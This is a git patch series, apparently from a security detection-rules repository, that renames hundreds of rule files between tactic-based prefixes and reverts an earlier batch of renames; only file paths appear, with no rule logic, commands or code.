rules/linux/persistence_kernel_driver_load.toml diff --git a/rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml similarity index 100% rename from rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml rename to rules/linux/persistence_kernel_driver_load_by_non_root.toml diff --git a/rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml similarity index 100% rename from rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml rename to rules/linux/persistence_kernel_module_load_from_unusual_location.toml diff --git a/rules/linux/defense_evasion_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml similarity index 100% rename from rules/linux/defense_evasion_kworker_file_creation.toml rename to rules/linux/persistence_kworker_file_creation.toml diff --git a/rules/linux/initial_access_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml similarity index 100% rename from rules/linux/initial_access_linux_shell_activity_via_web_server.toml rename to rules/linux/persistence_linux_shell_activity_via_web_server.toml diff --git a/rules/linux/credential_access_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml similarity index 100% rename from rules/linux/credential_access_pluggable_authentication_module_creation.toml rename to rules/linux/persistence_pluggable_authentication_module_creation.toml diff --git a/rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml similarity index 100% rename from rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml rename to rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml diff --git a/rules/linux/command_and_control_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml similarity index 100% rename from rules/linux/command_and_control_pluggable_authentication_module_source_download.toml rename to rules/linux/persistence_pluggable_authentication_module_source_download.toml diff --git a/rules/linux/privilege_escalation_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml similarity index 100% rename from rules/linux/privilege_escalation_process_capability_set_via_setcap.toml rename to rules/linux/persistence_process_capability_set_via_setcap.toml diff --git a/rules/linux/privilege_escalation_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml similarity index 100% rename from rules/linux/privilege_escalation_setuid_setgid_capability_set.toml rename to rules/linux/persistence_setuid_setgid_capability_set.toml diff --git a/rules/linux/defense_evasion_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml similarity index 100% rename from rules/linux/defense_evasion_shared_object_creation.toml rename to rules/linux/persistence_shared_object_creation.toml diff --git a/rules/linux/command_and_control_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml similarity index 100% rename from rules/linux/command_and_control_simple_web_server_connection_accepted.toml rename to rules/linux/persistence_simple_web_server_connection_accepted.toml diff --git a/rules/linux/initial_access_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml similarity index 100% rename from rules/linux/initial_access_ssh_via_backdoored_system_user.toml rename to rules/linux/persistence_ssh_via_backdoored_system_user.toml diff --git a/rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml similarity index 100% rename from rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml rename to rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml diff --git a/rules/linux/command_and_control_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml similarity index 100% rename from rules/linux/command_and_control_systemd_netcon.toml rename to rules/linux/persistence_systemd_netcon.toml diff --git a/rules/linux/execution_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml similarity index 100% rename from rules/linux/execution_systemd_service_started.toml rename to rules/linux/persistence_systemd_service_started.toml diff --git a/rules/linux/execution_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml similarity index 100% rename from rules/linux/execution_systemd_shell_execution.toml rename to rules/linux/persistence_systemd_shell_execution.toml diff --git a/rules/linux/execution_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml similarity index 100% rename from rules/linux/execution_unusual_exim4_child_process.toml rename to rules/linux/persistence_unusual_exim4_child_process.toml diff --git a/rules/linux/defense_evasion_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml similarity index 100% rename from rules/linux/defense_evasion_unusual_pam_grantor.toml rename to rules/linux/persistence_unusual_pam_grantor.toml diff --git a/rules/linux/lateral_movement_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml similarity index 100% rename from rules/linux/lateral_movement_unusual_sshd_child_process.toml rename to rules/linux/persistence_unusual_sshd_child_process.toml diff --git a/rules/linux/execution_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml similarity index 100% rename from rules/linux/execution_web_server_sus_child_spawned.toml rename to rules/linux/persistence_web_server_sus_child_spawned.toml diff --git a/rules/linux/execution_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml similarity index 100% rename from rules/linux/execution_web_server_sus_command_execution.toml rename to rules/linux/persistence_web_server_sus_command_execution.toml diff --git a/rules/linux/command_and_control_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml similarity index 100% rename from rules/linux/command_and_control_web_server_sus_destination_port.toml rename to rules/linux/persistence_web_server_sus_destination_port.toml diff --git a/rules/linux/execution_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml similarity index 100% rename from rules/linux/execution_web_server_unusual_command_execution.toml rename to rules/linux/persistence_web_server_unusual_command_execution.toml diff --git a/rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml similarity index 100% rename from rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml rename to rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml diff --git a/rules/linux/credential_access_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml similarity index 100% rename from rules/linux/credential_access_dac_permissions.toml rename to rules/linux/privilege_escalation_dac_permissions.toml diff --git a/rules/linux/defense_evasion_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml similarity index 100% rename from rules/linux/defense_evasion_kworker_uid_elevation.toml rename to rules/linux/privilege_escalation_kworker_uid_elevation.toml diff --git a/rules/linux/persistence_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml similarity index 100% rename from rules/linux/persistence_ld_preload_shared_object_modif.toml rename to rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml diff --git a/rules/linux/persistence_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml similarity index 100% rename from rules/linux/persistence_linux_suspicious_symbolic_link.toml rename to rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml diff --git a/rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml similarity index 100% rename from rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml rename to rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml diff --git a/rules/linux/initial_access_potential_bufferoverflow_attack.toml b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml similarity index 100% rename from rules/linux/initial_access_potential_bufferoverflow_attack.toml rename to rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml diff --git a/rules/linux/execution_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml similarity index 100% rename from rules/linux/execution_potential_wildcard_shell_spawn.toml rename to rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml diff --git a/rules/linux/defense_evasion_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml similarity index 100% rename from rules/linux/defense_evasion_sda_disk_mount_non_root.toml rename to rules/linux/privilege_escalation_sda_disk_mount_non_root.toml diff --git a/rules/linux/credential_access_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml similarity index 100% rename from rules/linux/credential_access_shadow_file_read.toml rename to rules/linux/privilege_escalation_shadow_file_read.toml diff --git a/rules/linux/persistence_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml similarity index 100% rename from rules/linux/persistence_sudo_hijacking.toml rename to rules/linux/privilege_escalation_sudo_hijacking.toml diff --git a/rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml similarity index 100% rename from rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml rename to rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml diff --git a/rules/linux/persistence_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml similarity index 100% rename from rules/linux/persistence_suspicious_passwd_file_write.toml rename to rules/linux/privilege_escalation_suspicious_passwd_file_write.toml From 0b7ddfa59572ed0c1721375ea034a496833e0a77 Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud Date: Tue, 24 Mar 2026 11:15:16 +0100 Subject: [PATCH 08/16] Revert "++" This reverts commit e83ddf130daef6fcdece2764d684cca21338d534. --- ...cation.toml => defense_evasion_genai_config_modification.toml} | 0 ...l => defense_evasion_genai_process_compiling_executables.toml} | 0 ...evasion_genai_process_encoding_prior_to_network_activity.toml} | 0 ...ep.toml => discovery_virtual_machine_fingerprinting_grep.toml} | 0 ...ert.toml => initial_access_azure_o365_with_network_alert.toml} | 0 ...ml => persistence_web_server_potential_command_injection.toml} | 0 ...ap_execution.toml => privilege_escalation_trap_execution.toml} | 0 ...ng_created.toml => collection_cloudtrail_logging_created.toml} | 0 ...oup.toml => credential_access_iam_user_addition_to_group.toml} | 0 ...e_restored.toml => defense_evasion_rds_instance_restored.toml} | 0 ... => defense_evasion_s3_bucket_lifecycle_expiration_added.toml} | 0 ..._sqs_purge_queue.toml => defense_evasion_sqs_purge_queue.toml} | 0 ...n_token.toml => defense_evasion_sts_get_federation_token.toml} | 0 ...oml => execution_lambda_external_layer_added_to_function.toml} | 0 ..._user.toml => exfiltration_dynamodb_scan_by_unusual_user.toml} | 0 ...=> exfiltration_ec2_full_network_packet_capture_detected.toml} | 0 ...snapshot_export.toml => exfiltration_rds_snapshot_export.toml} | 0 ...ation_s3_bucket_policy_added_for_external_account_access.toml} | 0 ...=> exfiltration_s3_bucket_policy_added_for_public_access.toml} | 0 ....toml => impact_aws_eventbridge_rule_disabled_or_deleted.toml} | 0 ....toml => impact_aws_s3_bucket_enumeration_or_brute_force.toml} | 0 ...ogging_updated.toml => impact_cloudtrail_logging_updated.toml} | 0 ...up_deletion.toml => impact_cloudwatch_log_group_deletion.toml} | 0 ...m_deletion.toml => impact_cloudwatch_log_stream_deletion.toml} | 0 ...ebs_encryption.toml => impact_ec2_disable_ebs_encryption.toml} | 0 ...vate_mfa_device.toml => impact_iam_deactivate_mfa_device.toml} | 0 ...impact_rds_instance_cluster_deletion_protection_disabled.toml} | 0 ...al_movement_ec2_instance_connect_ssh_public_key_uploaded.toml} | 0 ...ogin.toml => lateral_movement_ec2_instance_console_login.toml} | 0 ... lateral_movement_sns_topic_message_publish_by_rare_user.toml} | 0 ...cl_creation.toml => persistence_ec2_network_acl_creation.toml} | 0 ....toml => persistence_ec2_route_table_modified_or_deleted.toml} | 0 ...stence_ec2_security_group_configuration_change_detection.toml} | 0 ...toml => persistence_iam_api_calls_via_user_session_token.toml} | 0 ...er_created.toml => persistence_iam_oidc_provider_created.toml} | 0 ...stence_lambda_backdoor_invoke_function_for_any_principal.toml} | 0 ...made_public.toml => persistence_rds_instance_made_public.toml} | 0 ...ml => persistence_route_53_domain_transfer_lock_disabled.toml} | 0 ...rsistence_route_53_domain_transferred_to_another_account.toml} | 0 ...> persistence_route_53_hosted_zone_associated_with_a_vpc.toml} | 0 ...te_table_created.toml => persistence_route_table_created.toml} | 0 ...alation_iam_administratoraccess_policy_attached_to_group.toml} | 0 ...calation_iam_administratoraccess_policy_attached_to_role.toml} | 0 ...calation_iam_administratoraccess_policy_attached_to_user.toml} | 0 ..._escalation_iam_customer_managed_policy_attached_to_role.toml} | 0 ...d.toml => privilege_escalation_iam_saml_provider_updated.toml} | 0 ...ml => privilege_escalation_iam_update_assume_role_policy.toml} | 0 ..._chaining.toml => privilege_escalation_sts_role_chaining.toml} | 0 ...l => resource_development_sns_topic_created_by_rare_user.toml} | 0 ....toml => credential_access_key_vault_excessive_retrieval.toml} | 0 ...oml => credential_access_storage_account_key_regenerated.toml} | 0 ...> discovery_entra_id_teamfiltration_user_agents_detected.toml} | 0 ... => discovery_storage_blob_container_access_modification.toml} | 0 ...xfiltration_azure_storage_blob_download_azcopy_sas_token.toml} | 0 ...ccess_azure_arc_cluster_credential_access_unusual_source.toml} | 0 ...ial_access_entra_id_actor_token_user_impersonation_abuse.toml} | 0 ...tial_access_entra_id_device_code_auth_with_broker_client.toml} | 0 ...ml => initial_access_entra_id_external_guest_user_invite.toml} | 0 ...nitial_access_entra_id_federated_login_by_unusual_client.toml} | 0 ...ss_entra_id_graph_single_session_from_multiple_addresses.toml} | 0 ...ntra_id_illicit_consent_grant_via_registered_application.toml} | 0 ...entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} | 0 ..._id_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...initial_access_entra_id_protection_sign_in_risk_detected.toml} | 0 ...> initial_access_entra_id_rare_app_id_for_principal_auth.toml} | 0 ...ss_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} | 0 ... initial_access_graph_first_occurrence_of_client_request.toml} | 0 ...t_created.toml => persistence_automation_account_created.toml} | 0 ... persistence_entra_id_conditional_access_policy_modified.toml} | 0 ..._user.toml => persistence_entra_id_mfa_disabled_for_user.toml} | 0 ...ce_entra_id_privileged_identity_management_role_modified.toml} | 0 ...istence_entra_id_tenant_domain_federation_via_audit_logs.toml} | 0 ... persistence_entra_id_user_signed_in_from_unusual_device.toml} | 0 ...n.toml => persistence_graph_eam_addition_or_modification.toml} | 0 ...ilege_escalation_azure_rbac_administrator_roles_assigned.toml} | 0 ...escalation_entra_id_elevate_to_user_administrator_access.toml} | 0 ... privilege_escalation_kubernetes_aks_rolebinding_created.toml} | 0 ...port.toml => exfiltration_ml_high_bytes_destination_port.toml} | 0 ...oml => defense_evasion_gcp_pub_sub_subscription_deletion.toml} | 0 ...etion.toml => defense_evasion_gcp_pub_sub_topic_deletion.toml} | 0 ... defense_evasion_gcp_storage_bucket_permissions_modified.toml} | 0 ...efense_evasion_gcp_virtual_private_cloud_network_deleted.toml} | 0 ...ation.toml => exfiltration_gcp_logging_sink_modification.toml} | 0 ...tion.toml => initial_access_gcp_iam_custom_role_creation.toml} | 0 ...toml => persistence_gcp_iam_service_account_key_deletion.toml} | 0 ..._github_app_deleted.toml => execution_github_app_deleted.toml} | 0 ...=> execution_github_high_number_of_cloned_repos_from_pat.toml} | 0 ...app_installed.toml => execution_new_github_app_installed.toml} | 0 ...user.toml => exfiltration_high_number_of_cloning_by_user.toml} | 0 ...oml => impact_github_repository_activity_from_unusual_ip.toml} | 0 ... => initial_access_github_actions_bot_first_push_to_repo.toml} | 0 ..._google_drive_ownership_transferred_via_google_workspace.toml} | 0 ...orkspace_drive_encryption_key_accessed_by_anonymous_user.toml} | 0 ...toml => impact_google_workspace_mfa_enforcement_disabled.toml} | 0 ...ial_access_external_user_added_to_google_workspace_group.toml} | 0 ...> initial_access_google_workspace_suspended_user_renewed.toml} | 0 ..._access_object_copied_to_external_drive_with_app_consent.toml} | 0 ...toml => persistence_google_workspace_2sv_policy_disabled.toml} | 0 ...=> persistence_google_workspace_password_policy_modified.toml} | 0 ...rsistence_mfa_disabled_for_google_workspace_organization.toml} | 0 ...request.toml => discovery_denied_service_account_request.toml} | 0 ...ion_request.toml => execution_forbidden_creation_request.toml} | 0 ...ml => execution_forbidden_request_from_unsual_user_agent.toml} | 0 ...toml => execution_unusual_request_response_by_user_agent.toml} | 0 ...> persistence_exposed_service_created_with_type_nodeport.toml} | 0 ...tion_container_created_with_excessive_linux_capabilities.toml} | 0 ...pc.toml => privilege_escalation_pod_created_with_hostipc.toml} | 0 ...oml => privilege_escalation_pod_created_with_hostnetwork.toml} | 0 ...id.toml => privilege_escalation_pod_created_with_hostpid.toml} | 0 ...ge_escalation_pod_created_with_sensitive_hostpath_volume.toml} | 0 ...ated.toml => privilege_escalation_privileged_pod_created.toml} | 0 ..._sensitive_rbac_change_followed_by_workload_modification.toml} | 0 ...escalation_sensitive_workload_modification_by_user_agent.toml} | 0 ...rivilege_escalation_service_account_rbac_write_operation.toml} | 0 ...tion_suspicious_assignment_of_controller_service_account.toml} | 0 ...s.toml => lateral_movement_ml_high_mean_rdp_process_args.toml} | 0 ...ml => lateral_movement_ml_spike_in_remote_file_transfers.toml} | 0 ...earch.toml => discovery_sharepoint_sensitive_term_search.toml} | 0 ...on.toml => exfiltration_exchange_transport_rule_creation.toml} | 0 ...oml => exfiltration_exchange_transport_rule_modification.toml} | 0 ...dentity_illicit_consent_grant_via_registered_application.toml} | 0 ...ity_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...l => initial_access_identity_unusual_sso_errors_for_user.toml} | 0 ...ge_escalation_exchange_new_or_modified_federation_domain.toml} | 0 ...vilege_escalation_sharepoint_site_collection_admin_added.toml} | 0 ... credential_access_multiple_user_agent_os_authentication.toml} | 0 ...oml => credential_access_okta_aitm_session_cookie_replay.toml} | 0 ...cess.toml => credential_access_user_impersonation_access.toml} | 0 ...n_suspicious_okta_user_password_reset_or_unlock_attempts.toml} | 0 ...ml => impact_okta_attempt_to_deactivate_okta_application.toml} | 0 ...n.toml => impact_okta_attempt_to_modify_okta_application.toml} | 0 ...oml => initial_access_sign_in_events_via_third_party_idp.toml} | 0 ...ss_successful_application_sso_from_unknown_client_device.toml} | 0 ...ml => lateral_movement_multiple_sessions_for_single_user.toml} | 0 ...oml => persistence_mfa_deactivation_with_no_reactivation.toml} | 0 ...a_attempt_to_modify_or_delete_application_sign_on_policy.toml} | 0 ...redentials_used_to_login_to_okta_account_after_mfa_reset.toml} | 0 ... => command_and_control_perl_outbound_network_connection.toml} | 0 ...pbpaste.toml => credential_access_high_volume_of_pbpaste.toml} | 0 ...ed.toml => defense_evasion_suspicious_tcc_access_granted.toml} | 0 ...picious_sip_check.toml => discovery_suspicious_sip_check.toml} | 0 ...oml => execution_installer_package_spawned_network_event.toml} | 0 ...=> execution_scripting_osascript_exec_followed_by_netcon.toml} | 0 ...=> initial_access_suspicious_mac_ms_office_child_process.toml} | 0 ...nabled.toml => lateral_movement_remote_ssh_login_enabled.toml} | 0 ..._attempt.toml => lateral_movement_vpn_connection_attempt.toml} | 0 ...logon.toml => persistence_account_creation_hide_at_logon.toml} | 0 ...ile.toml => persistence_curl_execution_via_shell_profile.toml} | 0 ... persistence_evasion_hidden_launch_agent_deamon_creation.toml} | 0 ...plist_filename.toml => persistence_hidden_plist_filename.toml} | 0 ...oml => privilege_escalation_applescript_with_admin_privs.toml} | 0 ...oml => privilege_escalation_explicit_creds_via_scripting.toml} | 0 ...n.toml => privilege_escalation_local_user_added_to_admin.toml} | 0 ...ilemod.toml => privilege_escalation_root_crontab_filemod.toml} | 0 ...p.toml => privilege_escalation_user_added_to_admin_group.toml} | 0 ...ous_script.toml => execution_ml_windows_anomalous_script.toml} | 0 ..._linux.toml => persistence_ml_rare_process_by_host_linux.toml} | 0 ...y.toml => persistence_ml_windows_anomalous_path_activity.toml} | 0 ...oml => persistence_ml_windows_anomalous_process_creation.toml} | 0 ...mand_and_control_accepted_default_telnet_port_connection.toml} | 0 ...nd_control_rdp_remote_desktop_protocol_from_the_internet.toml} | 0 ..._control_vnc_virtual_network_computing_from_the_internet.toml} | 0 ...ml => initial_access_react_server_components_rce_attempt.toml} | 0 ...initial_access_rpc_remote_procedure_call_to_the_internet.toml} | 0 ...access_smb_windows_file_sharing_activity_to_the_internet.toml} | 0 ..._node.toml => initial_access_unsecure_elasticsearch_node.toml} | 0 ... privilege_escalation_endgame_cred_manipulation_detected.toml} | 0 ...privilege_escalation_endgame_cred_manipulation_prevented.toml} | 0 ...> privilege_escalation_endgame_permission_theft_detected.toml} | 0 ... privilege_escalation_endgame_permission_theft_prevented.toml} | 0 ... privilege_escalation_endgame_process_injection_detected.toml} | 0 ...privilege_escalation_endgame_process_injection_prevented.toml} | 0 ..._home_page.toml => command_and_control_outlook_home_page.toml} | 0 ...didns_wildcard.toml => credential_access_adidns_wildcard.toml} | 0 ...parent.toml => credential_access_browsers_unusual_parent.toml} | 0 ..._backdoor.toml => credential_access_dcsync_user_backdoor.toml} | 0 ...node_creation.toml => credential_access_dnsnode_creation.toml} | 0 ...susp_dll.toml => credential_access_lsass_loaded_susp_dll.toml} | 0 ...tial_access_seenabledelegationprivilege_assigned_to_user.toml} | 0 ...credentials.toml => credential_access_shadow_credentials.toml} | 0 ...odified.toml => credential_access_spn_attribute_modified.toml} | 0 ..._access.toml => credential_access_web_config_file_access.toml} | 0 ...fense_evasion_masquerading_suspicious_werfault_childproc.toml} | 0 ...e_payload.toml => defense_evasion_msiexec_remote_payload.toml} | 0 ...monologue.toml => defense_evasion_regmod_remotemonologue.toml} | 0 ...oml => defense_evasion_scheduledjobs_at_protocol_enabled.toml} | 0 ...nds.toml => defense_evasion_suspicious_certutil_commands.toml} | 0 ...defense_evasion_suspicious_process_access_direct_syscall.toml} | 0 ...ss.toml => defense_evasion_suspicious_zoom_child_process.toml} | 0 ...> defense_evasion_unusual_network_connection_via_dllhost.toml} | 0 ... defense_evasion_unusual_network_connection_via_rundll32.toml} | 0 ...tion_wsl_bash_exec.toml => defense_evasion_wsl_bash_exec.toml} | 0 ..._com_object_xwizard.toml => execution_com_object_xwizard.toml} | 0 ...l => execution_command_prompt_connecting_to_the_internet.toml} | 0 ...ia_rundll32.toml => execution_command_shell_via_rundll32.toml} | 0 ...igned.toml => execution_delayed_via_ping_lolbas_unsigned.toml} | 0 ...ortcut_files.toml => execution_downloaded_shortcut_files.toml} | 0 ...ownloaded_url_file.toml => execution_downloaded_url_file.toml} | 0 ..._via_wmiprvse.toml => execution_enumeration_via_wmiprvse.toml} | 0 ...path_cmdline.toml => execution_from_unusual_path_cmdline.toml} | 0 ..._html_help_executable_program_connecting_to_the_internet.toml} | 0 ...tool_functions.toml => execution_posh_hacktool_functions.toml} | 0 ...le_executable.toml => execution_posh_portable_executable.toml} | 0 ...ution_register_server_program_connecting_to_the_internet.toml} | 0 ...cmd_via_netcat.toml => execution_revshell_cmd_via_netcat.toml} | 0 ..._remote_webdav.toml => execution_scripting_remote_webdav.toml} | 0 ...l_sxs_dll.toml => execution_shared_modules_local_sxs_dll.toml} | 0 ...uspicious_psexesvc.toml => execution_suspicious_psexesvc.toml} | 0 ...piled_html_file.toml => execution_via_compiled_html_file.toml} | 0 ...shell_conhost.toml => execution_via_hidden_shell_conhost.toml} | 0 ...path.toml => execution_via_mmc_console_file_unusual_path.toml} | 0 ..._susp_args.toml => execution_windows_cmd_shell_susp_args.toml} | 0 ...tcha_cmd_ps.toml => execution_windows_fakecaptcha_cmd_ps.toml} | 0 ...susp_args.toml => execution_windows_powershell_susp_args.toml} | 0 ..._internet.toml => execution_windows_script_from_internet.toml} | 0 ...re_destination.toml => exfiltration_smb_rare_destination.toml} | 0 ...oml => impact_volume_shadow_copy_deletion_via_powershell.toml} | 0 ...wmic.toml => impact_volume_shadow_copy_deletion_via_wmic.toml} | 0 ...l => initial_access_evasion_suspicious_htm_file_creation.toml} | 0 ...amcity.toml => initial_access_exploit_jetbrains_teamcity.toml} | 0 ...oit.toml => initial_access_potential_webhelpdesk_exploit.toml} | 0 ...tachment.toml => initial_access_rdp_file_mail_attachment.toml} | 0 ...shell.toml => initial_access_script_executing_powershell.toml} | 0 ...i.toml => initial_access_scripts_process_started_via_wmi.toml} | 0 ...nitial_access_suspicious_execution_from_vscode_extension.toml} | 0 ...itial_access_suspicious_ms_exchange_worker_child_process.toml} | 0 ...oml => initial_access_suspicious_ms_office_child_process.toml} | 0 ...ml => initial_access_suspicious_ms_outlook_child_process.toml} | 0 ...l => initial_access_suspicious_windows_server_update_svc.toml} | 0 ...cve_2025_33053.toml => initial_access_url_cve_2025_33053.toml} | 0 ...initial_access_via_explorer_suspicious_child_parent_args.toml} | 0 ...ver.toml => initial_access_webshell_screenconnect_server.toml} | 0 ..._com.toml => initial_access_xsl_script_execution_via_com.toml} | 0 ...e_creds_pth.toml => lateral_movement_alternate_creds_pth.toml} | 0 ...ecution_cmd_service.toml => lateral_movement_cmd_service.toml} | 0 ...e_evasion_dcom_mmc20.toml => lateral_movement_dcom_mmc20.toml} | 0 ... => lateral_movement_dcom_shellwindow_shellbrowserwindow.toml} | 0 ...ution_incoming_wmi.toml => lateral_movement_incoming_wmi.toml} | 0 ...d_registry.toml => lateral_movement_rdp_enabled_registry.toml} | 0 ...remote_services.toml => lateral_movement_remote_services.toml} | 0 ...log.toml => lateral_movement_remote_task_creation_winlog.toml} | 0 ...sk_target.toml => lateral_movement_scheduled_task_target.toml} | 0 ...en.toml => lateral_movement_unusual_dns_service_children.toml} | 0 ...toml => lateral_movement_unusual_dns_service_file_writes.toml} | 0 ...via_wsus_update.toml => lateral_movement_via_wsus_update.toml} | 0 ...oml => persistence_evasion_hidden_local_account_creation.toml} | 0 ...rsistence_evasion_registry_startup_shell_folder_modified.toml} | 0 ...k_startup.toml => persistence_msi_installer_task_startup.toml} | 0 ...istics.toml => persistence_sdprop_exclusion_dsheuristics.toml} | 0 ..._services_registry.toml => persistence_services_registry.toml} | 0 ...me.toml => persistence_suspicious_scheduled_task_runtime.toml} | 0 ..._services.toml => persistence_system_shells_via_services.toml} | 0 ...p_scheduled_task.toml => persistence_temp_scheduled_task.toml} | 0 ..._command.toml => persistence_via_bits_job_notify_command.toml} | 0 ...luename.toml => persistence_via_hidden_run_key_valuename.toml} | 0 ...ices.toml => persistence_via_wmi_stdregprov_run_services.toml} | 0 ...ml => persistence_via_xp_cmdshell_mssql_stored_procedure.toml} | 0 ...ebshell_detection.toml => persistence_webshell_detection.toml} | 0 ... privilege_escalation_account_takeover_mixed_logon_types.toml} | 0 ...use.toml => privilege_escalation_badsuccessor_dmsa_abuse.toml} | 0 ...=> privilege_escalation_create_process_as_different_user.toml} | 0 ...=> privilege_escalation_create_process_with_token_unpriv.toml} | 0 ...aming_ldap.toml => privilege_escalation_credroaming_ldap.toml} | 0 ...gistry.toml => privilege_escalation_disable_uac_registry.toml} | 0 ...ml => privilege_escalation_dmsa_creation_by_unusual_user.toml} | 0 ...ll.toml => privilege_escalation_dns_serverlevelplugindll.toml} | 0 ...oaded.toml => privilege_escalation_expired_driver_loaded.toml} | 0 ...oml => privilege_escalation_gpo_schtask_service_creation.toml} | 0 ...ript.toml => privilege_escalation_group_policy_iniscript.toml} | 0 ...toml => privilege_escalation_group_policy_scheduled_task.toml} | 0 ...toml => privilege_escalation_krbrelayup_service_creation.toml} | 0 ...th_package.toml => privilege_escalation_lsa_auth_package.toml} | 0 ...oken_local.toml => privilege_escalation_make_token_local.toml} | 0 ...toml => privilege_escalation_newcreds_logon_rare_process.toml} | 0 ... privilege_escalation_port_monitor_print_processor_abuse.toml} | 0 ...on.toml => privilege_escalation_posh_token_impersonation.toml} | 0 ...ivilege_escalation_printspooler_suspicious_file_deletion.toml} | 0 ...d.toml => privilege_escalation_reg_service_imagepath_mod.toml} | 0 ... privilege_escalation_service_control_spawned_script_int.toml} | 0 ...e_ip.toml => privilege_escalation_takeover_new_source_ip.toml} | 0 ...l => privilege_escalation_tokenmanip_sedebugpriv_enabled.toml} | 0 ...lipup.toml => privilege_escalation_uac_bypass_com_clipup.toml} | 0 ...tal.toml => privilege_escalation_uac_bypass_com_ieinstal.toml} | 0 ...privilege_escalation_uac_bypass_com_interface_icmluautil.toml} | 0 ...ml => privilege_escalation_uac_bypass_diskcleanup_hijack.toml} | 0 ....toml => privilege_escalation_uac_bypass_dll_sideloading.toml} | 0 ...wer.toml => privilege_escalation_uac_bypass_event_viewer.toml} | 0 ...ndir.toml => privilege_escalation_uac_bypass_mock_windir.toml} | 0 ...toml => privilege_escalation_uac_bypass_winfw_mmc_hijack.toml} | 0 ...=> privilege_escalation_unusual_parentchild_relationship.toml} | 0 ...privilege_escalation_unusual_svchost_childproc_childless.toml} | 0 ...token_theft.toml => privilege_escalation_via_token_theft.toml} | 0 ... privilege_escalation_windows_service_via_unusual_client.toml} | 0 ..._activity.toml => command_and_control_bitsadmin_activity.toml} | 0 ...toml => credential_access_entra_id_risk_detection_signal.toml} | 0 ...on.toml => credential_access_mdmp_file_unusual_extension.toml} | 0 ...xtension.toml => defense_evasion_download_susp_extension.toml} | 0 ...msoffice.toml => defense_evasion_injection_from_msoffice.toml} | 0 ...s_child.toml => defense_evasion_outlook_suspicious_child.toml} | 0 ...h_registry.toml => defense_evasion_service_path_registry.toml} | 0 ...vices_exe_path.toml => defense_evasion_services_exe_path.toml} | 0 ...rite_dac_access.toml => defense_evasion_write_dac_access.toml} | 0 ...netraw_capability.toml => discovery_capnetraw_capability.toml} | 0 ...enumeration.toml => discovery_linux_modprobe_enumeration.toml} | 0 ...l_enumeration.toml => discovery_linux_sysctl_enumeration.toml} | 0 ...or_pat.toml => execution_github_new_event_action_for_pat.toml} | 0 ...at.toml => execution_github_new_repo_interaction_for_pat.toml} | 0 ...r.toml => execution_github_new_repo_interaction_for_user.toml} | 0 